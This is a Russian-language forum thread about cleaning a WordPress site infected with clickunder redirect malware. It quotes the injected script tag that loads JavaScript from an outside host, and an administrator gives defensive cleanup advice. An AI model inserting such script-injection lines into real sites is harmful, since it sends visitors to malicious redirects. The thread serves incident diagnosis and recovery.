Решена Вирус на сайте Wordpress (clickunder, bodyclick)

Тема в разделе "Анализ сайтов на наличие вирусов", создана пользователем rainchik, 1 июн 2015.

Статус темы:
Закрыта.
  1. rainchik
    Оффлайн

    rainchik Новый пользователь

    Сообщения:
    2
    Симпатии:
    0
    Добрый день,
    возникла проблема, бьюсь уже не первую неделю. Есть сайт, собран на wordpress, лежит на хостинге. Адрес effectifs . ru
    Саппорт провайдера начал слать письма о зараженных php-файлах. Файлы были прочесаны и вычищены.
    Однако, на сайте сидит вирус, который редиректит на не легитимные страницы и сидит где-то в javascript-файлах.

    Логика вируса такая: приходим первый раз на страницу(Контакты,Соискатель и тп), при нажатии на любое место страницы, открывается новая вкладка с переходом сначала на
    Код (Text):
    http://googleframe.net/tijaq.cgi?18
    , затем на aliexpress, при этом записывается кука на сутки(название clickunder), сутки живем спокойно, ну или чистим куки и снова ловим переход).

    В общем, я уже голову сломал, как его найти.
    Было сделано(кроме прогона антивирусниками файлов сайта):

    1. Замена темы - результат тот же.
    2. Замена wordpress - скачал на сервер чистый wordpress, скопировал wp-config.php и wp-content - результат тот же
    3. Заглянул в базу - там очень много левых табличек (с названиями от используемой темы), как там наводить ревизию пока не представляю.
    4. Нашел js со стороннего хоста, который делает редирект и записывает куку.

    на странице сайта (например контакты) есть строчка
    HTML:
    <p><script type='text/javascript' src='http://online-sale24.com/1.js'></script><script type='text/javascript' src='http://online-sale24.com/1.js'></script></p>
    в исходном коде, её конечно нет. как найти, что её генерит, пока не знаю.

    В общем, буду рад любым советам, так как уже не знаю в каком направлении двигаться.
     
    Последнее редактирование модератором: 1 июн 2015
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Какой хостинг? Виртуальный или сервер (виртуальный, выделенный).

    Начнем с классики (если уже выполняли, то хорошо)
    1. Проверка локальной машин(ы) с которой проводится администрирование.
    2. Меняем все пароли (FTP, БД и пр) связанные с ресурсом.
    3. В зависимости от типа хостинга, проверить антивирусом сервер clamav например. И проверить учетные данные.
    4. Проверить сам сайт (http://yandex.ru/promo/manul#about)
    5. Нужно чистить шаблоны и БД (думаю знатоки дадут более детальные рекомендации)
    6. Проверить не лежит ли проблема в плоскости уязвимого ПО/модов.
     
  3. rainchik
    Оффлайн

    rainchik Новый пользователь

    Сообщения:
    2
    Симпатии:
    0
    Невнимательность - главный мой порок. Прогрепав, как только можно все файлы сайта(php,js и проч), не посмотрел на сами статичные страницы и заметки(ну и до бд так и не добрался). А ведь в каждой из них сидела строчка в конце файла
    Код (Text):
    <script type='text/javascript' src='http://online-sale24.com/1.js'></script>
    Которая и подгружала JS со стороннего сервера.
    Убрал с сайта комментарии, не уверен до конца, но сложилось впечатление, что при создании коммента создавался пользователь с админскими правами.

    хостинг виртуальный.
    спасибо, по всем пунктам пробегусь.
    Тему, думаю, можно закрывать.
     
    Последнее редактирование: 2 июн 2015
Статус темы:
Закрыта.

Поделиться этой страницей